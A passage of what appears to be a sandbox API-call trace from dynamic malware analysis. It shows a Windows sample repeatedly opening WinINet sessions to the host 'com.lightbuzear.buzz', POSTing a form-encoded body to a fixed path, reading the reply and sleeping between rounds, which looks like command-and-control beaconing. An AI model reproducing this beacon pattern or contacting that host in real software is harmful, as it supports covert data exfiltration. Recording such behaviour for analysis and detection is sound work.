dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0196.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0196.540] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153d8 | out: hHeap=0x4780000) returned 1 [0196.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815338 [0196.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0196.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815220 [0196.540] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0196.541] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0196.541] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0196.541] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0196.541] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815220 | out: hHeap=0x4780000) returned 1 [0196.541] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0196.541] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0196.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0196.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0196.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0196.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0196.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0196.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0196.552] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0196.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f940 [0196.552] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0196.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f8b0 [0196.552] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f940 | out: hHeap=0x4780000) returned 1 [0196.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0196.552] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f8b0 | out: hHeap=0x4780000) returned 1 [0196.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48154a0 [0196.552] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0196.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0196.552] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0196.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48153d8 [0196.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0196.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0196.552] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0196.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0196.553] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0196.553] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0197.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0197.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0197.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0197.586] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0197.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0197.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0197.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0197.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0197.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0197.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0197.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0197.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0197.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0197.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa18 [0197.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0197.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f8b0 [0197.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0197.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0197.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f8b0 | out: hHeap=0x4780000) returned 1 [0197.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4815388 [0197.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0197.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0197.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815388 | out: hHeap=0x4780000) returned 1 [0197.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815270 [0197.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0197.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48152c0 [0197.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0197.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0197.587] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0197.588] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0197.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48152c0 | out: hHeap=0x4780000) returned 1 [0197.588] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0197.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0197.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0197.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0197.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0197.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0197.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0197.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0197.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0197.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0197.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa18 [0197.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0197.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f8b0 [0197.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0197.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0197.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f8b0 | out: hHeap=0x4780000) returned 1 [0197.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48153b0 [0197.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0197.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0197.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0197.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815220 [0197.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0197.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0197.620] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0197.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0197.642] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0197.642] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0197.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0197.642] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0197.642] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0197.642] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0197.642] FreeLibrary (hLibModule=0x71570000) returned 1 [0197.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0197.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0197.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815478 | out: hHeap=0x4780000) returned 1 [0197.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ed8 | out: hHeap=0x4780000) returned 1 [0197.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0197.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815040 | out: hHeap=0x4780000) returned 1 [0197.644] Sleep (dwMilliseconds=0x2710) [0197.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0197.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0197.653] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0197.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0197.653] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0197.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0197.653] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0197.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0197.653] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0197.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f8b0 [0197.653] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0197.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa90 [0197.653] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f8b0 | out: hHeap=0x4780000) returned 1 [0197.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0197.653] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa90 | out: hHeap=0x4780000) returned 1 [0197.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f8b0 [0197.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e60 [0197.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0197.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0197.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e60 [0197.654] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0197.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0197.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0197.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0197.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0197.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0197.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0197.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0197.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0197.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0197.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f928 [0197.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0197.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f940 [0197.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f928 | out: hHeap=0x4780000) returned 1 [0197.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0197.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f940 | out: hHeap=0x4780000) returned 1 [0197.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4815040 [0197.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0197.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0197.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815040 | out: hHeap=0x4780000) returned 1 [0197.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ed8 [0197.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0197.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815040 [0197.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0197.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0197.656] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0197.656] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0197.656] FreeLibrary (hLibModule=0x71780000) returned 1 [0197.656] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815040 | out: hHeap=0x4780000) returned 1 [0197.656] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0197.656] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815040 [0197.656] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0197.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0197.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0197.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0197.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0197.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0197.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0197.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0197.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0197.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0197.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa18 [0197.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0197.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa90 [0197.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0197.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0197.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa90 | out: hHeap=0x4780000) returned 1 [0197.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f940 [0197.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815400 [0197.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815400 | out: hHeap=0x4780000) returned 1 [0197.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0197.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815388 [0197.658] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0197.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48152c0 [0197.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0197.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0197.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0197.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0197.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0197.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0197.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0197.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0197.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0197.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa78 [0197.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0197.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa18 [0197.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa78 | out: hHeap=0x4780000) returned 1 [0197.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0197.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0197.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f958 [0197.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48152e8 [0197.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48152e8 | out: hHeap=0x4780000) returned 1 [0197.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0197.659] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0197.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0197.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0197.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0197.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0197.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0197.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0197.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0197.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0197.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0197.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa78 [0197.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0197.660] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa90 [0197.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa78 | out: hHeap=0x4780000) returned 1 [0197.660] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0197.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa90 | out: hHeap=0x4780000) returned 1 [0197.660] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4815400 [0197.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0197.660] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0197.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815400 | out: hHeap=0x4780000) returned 1 [0197.660] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815248 [0197.660] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0197.660] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815428 [0197.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0197.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0197.660] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0197.661] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0197.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815428 | out: hHeap=0x4780000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0197.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0197.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0197.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0197.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0197.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa78 [0197.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa90 [0197.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa78 | out: hHeap=0x4780000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0197.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa90 | out: hHeap=0x4780000) returned 1 [0197.661] 